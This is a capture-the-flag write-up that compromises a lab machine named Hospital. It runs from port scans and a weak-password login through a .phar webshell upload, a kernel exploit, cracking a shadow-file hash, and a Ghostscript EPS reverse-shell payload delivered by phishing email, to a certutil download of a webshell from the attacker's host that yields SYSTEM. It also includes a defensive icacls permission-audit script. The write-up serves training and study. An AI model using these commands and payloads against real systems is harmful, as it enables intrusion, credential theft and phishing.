Box info
- OS: Windows
- Difficulty: Medium
PreEnum
fscan
10.10.11.241:139 open
10.10.11.241:8080 open
10.10.11.241:443 open
10.10.11.241:88 open
10.10.11.241:445 open
10.10.11.241:135 open
10.10.11.241:22 open
[*] NetInfo:
[*]10.10.11.241
[->]DC
[->]192.168.5.1
[->]10.10.11.241
[->]dead:beef::f108:9933:411b:d812
[->]dead:beef::1a0
[*] WebTitle: http://10.10.11.241:8080 code:302 len:0 title:None 跳转url: http://10.10.11.241:8080/login.php
[*] WebTitle: https://10.10.11.241 code:200 len:5379 title:Hospital Webmail :: 欢迎使用 Hospital Webmail
[*] WebTitle: http://10.10.11.241:8080/login.php code:200 len:5739 title:Login
Nmap
# Nmap 7.94 scan initiated Thu Nov 23 10:20:44 2023 as: nmap -sC -sV -v -oN nmap.log 10.10.11.241
Nmap scan report for 10.10.11.241
Host is up (0.47s latency).
Not shown: 980 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
|_ 256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-23 09:23:39Z)
135/tcp open tcpwrapped
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-06T10:49:03
| Not valid after: 2028-09-06T10:49:03
| MD5: 04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 924A68D347C80D0E502157E83812BB23
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-06T10:49:03
| Not valid after: 2028-09-06T10:49:03
| MD5: 04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-06T10:49:03
| Not valid after: 2028-09-06T10:49:03
| MD5: 04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-06T10:49:03
| Not valid after: 2028-09-06T10:49:03
| MD5: 04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Issuer: commonName=DC.hospital.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-05T18:39:34
| Not valid after: 2024-03-06T18:39:34
| MD5: 0c8a:ebc2:3231:590c:2351:ebbf:4e1d:1dbc
|_SHA-1: af10:4fad:1b02:073a:e026:eef4:8917:734b:f8e3:86a7
| rdp-ntlm-info:
| Target_Name: HOSPITAL
| NetBIOS_Domain_Name: HOSPITAL
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hospital.htb
| DNS_Computer_Name: DC.hospital.htb
| DNS_Tree_Name: hospital.htb
| Product_Version: 10.0.17763
|_ System_Time: 2023-11-23T09:25:11+00:00
8080/tcp open http Apache httpd 2.4.55 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS
| http-title: Login
|_Requested resource was login.php
|_http-open-proxy: Proxy might be redirecting requests
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.55 (Ubuntu)
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-11-23T09:25:07
|_ start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 23 10:26:21 2023 -- 1 IP address (1 host up) scanned in 336.95 seconds
- Port 443 speaks HTTPS: Apache on Windows x64 with PHP 8.0.28
- Port 8080 speaks HTTP: Apache on Ubuntu, acting as a proxy
- Three RPC ports
- 2103/tcp open msrpc Microsoft Windows RPC
- 2105/tcp open msrpc Microsoft Windows RPC
- 2107/tcp open msrpc Microsoft Windows RPC
user.txt
- Web 443
A login form showing the text Hospital Webmail, so this page is the hospital's webmail back end.
- Web 8080 Upload
A login form; the weak credentials admin/123456 get us in. There is a single feature, a file upload for a personal medical record.
Fuzzing the allowed upload extensions shows that .phar and .ps1 can be uploaded.
Use this PHP shell: https://github.com/flozz/p0wny-shell
Change the extension to .phar, upload it, then get a reverse shell.
Kernel exploit for privilege escalation: https://github.com/briskets/CVE-2021-3493/tree/main
A user hash is found in /etc/shadow:
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/
John cracks it to the plaintext qwe123!@#
This user can log in to the hospital webmail on port 443, where there is an email from drbrown.
It gives two pieces of information:
- an .eps file
- GhostScript is used to view it
So we can craft a phishing email carrying a shell inside an .eps file, using this tool:
https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection
Generate an EPS that spawns a reverse shell:
└─$ python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.14.52 -port 2333 --filename wkrev --extension eps
[+] Generated EPS payload file: wkrev.eps
Inject the payload: the PowerShell #3 (base64) reverse shell
└─$ python3 CVE_2023_36664_exploit.py --inject --payload "powershell -e <base64 payload omitted>" --filename revshell.eps
[+] Payload successfully injected into revshell.eps.
Send the phishing email.
The nc listener catches the shell.
Get user.txt:
PS C:\Users\drbrown.HOSPITAL\Desktop> type user.txt
6d70cadfc2a8e88eee3d7df0d0d628f4
Enum4system
This file appears to expose a plaintext password, chr!$br0wn:
PS C:\Users\drbrown.HOSPITAL\Documents> type ghostscript.bat
@echo off
set filename=%~1
powershell -command "$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospital\drbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:\Program` Files\gs\gs10.01.1\bin\gswin64c.exe" -dNOSAFER "C:\Users\drbrown.HOSPITAL\Downloads\%filename%" }"
We now have the drbrown user and its plaintext password chr!$br0wn.
The three RPC ports have not been used yet, so try enumerating with rpcclient:
└─$ sudo rpcclient -U "drbrown" 10.10.11.241
Password for [WORKGROUP\drbrown]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
So we go back to drbrown's shell to enumerate. On the C: drive we find xampp (an integrated web-stack bundle; it is in fact the web service behind port 443), which contains an htdocs folder.
Checking its permissions with icacls shows an NT AUTHORITY\SYSTEM entry:
PS C:\xampp> icacls htdocs
htdocs NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
So a shell dropped into this folder comes back with SYSTEM privileges.
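An added audit example (not from the writeup): this Python parser reads an icacls listing such as the one above and reports every principal outside an administrative allowlist that can create or modify files in the directory itself, which is the condition that turns a web root into a code-execution path at the web server's privilege level. The sample listing is the htdocs output copied from this page; the trusted-principal set is an assumption.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample: the icacls output for C:\xampp\htdocs as it appears in the writeup.
SAMPLE_ICACLS = """htdocs NT AUTHORITY\\LOCAL SERVICE:(OI)(CI)(F)
       NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
       BUILTIN\\Administrators:(I)(OI)(CI)(F)
       BUILTIN\\Users:(I)(OI)(CI)(RX)
       BUILTIN\\Users:(I)(CI)(AD)
       BUILTIN\\Users:(I)(CI)(WD)
       CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files"""

INHERITANCE = {"OI", "CI", "IO", "NP", "I"}                     # inheritance flags, not rights
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WDAC", "WO"}  # rights that allow creating or changing content
# Assumption: only these principals are expected to hold write rights on a web root.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "CREATOR OWNER"}

ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Z,]+\))+)$")


def parse_icacls(output: str, path: str) -> List[Tuple[str, Set[str], Set[str]]]:
    """Return (principal, inheritance_flags, rights) for every ACE in one icacls listing."""
    aces = []
    for line in output.splitlines():
        m = ACE_RE.match(line.strip())
        if not m:
            continue  # summary line or blank line
        who = m.group("who")
        if who.startswith(path + " "):  # the first line carries the path before the principal
            who = who[len(path) + 1:]
        flags: Set[str] = set()
        for group in re.findall(r"\(([A-Z,]+)\)", m.group("flags")):
            flags.update(group.split(","))  # explicit ACEs may list rights as (R,W)
        aces.append((who, flags & INHERITANCE, flags - INHERITANCE))
    return aces


def writable_by_untrusted(output: str, path: str) -> Dict[str, Set[str]]:
    """Map each non-trusted principal to the write rights it holds on the directory itself."""
    findings: Dict[str, Set[str]] = {}
    for who, inh, rights in parse_icacls(output, path):
        if who in TRUSTED or "IO" in inh:  # inherit-only ACEs do not apply to this directory
            continue
        grants = rights & WRITE_RIGHTS
        if grants:
            findings.setdefault(who, set()).update(grants)
    return findings
```

Running `writable_by_untrusted(SAMPLE_ICACLS, "htdocs")` flags BUILTIN\Users with AD and WD (any domain user can add files and subfolders to the web root) and LOCAL SERVICE with full control.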
Get System
Upload the PHP shell with a GUI into the htdocs folder:
PS C:\xampp\htdocs> certutil -urlcache -split -f http://10.10.14.52:8000/wkk.php wkkw.php
**** Online ****
0000 ...
3511
CertUtil: -URLCache command completed successfully.
Visit https://10.10.11.241/wkkw.php
Run the PowerShell #3 (base64) reverse shell.
We get a SYSTEM shell; root.txt is in the domain admin's directory.
Summary
This machine emulates part of a hospital's network environment, which makes it quite interesting.
1. Port 8080 proxies an HTTP service on an Ubuntu host; the file upload gives www-data.
2. The kernel exploit gives root on Ubuntu; /etc/shadow contains the drwilliams user's hash, which john cracks to the plaintext password.
3. The credentials drwilliams/qwe123!@# give access to the hospital webmail on port 443, where an email from drbrown asks drwilliams for an .eps file.
4. A phishing email carrying a shell in .eps format gets us onto drbrown's Windows machine (the DC) and user.txt.
5. On that machine's C: drive is the XAMPP folder behind the port 443 service. Its htdocs folder carries SYSTEM permissions; certutil downloads the GUI webshell from Kali, and running the PowerShell reverse shell gives SYSTEM.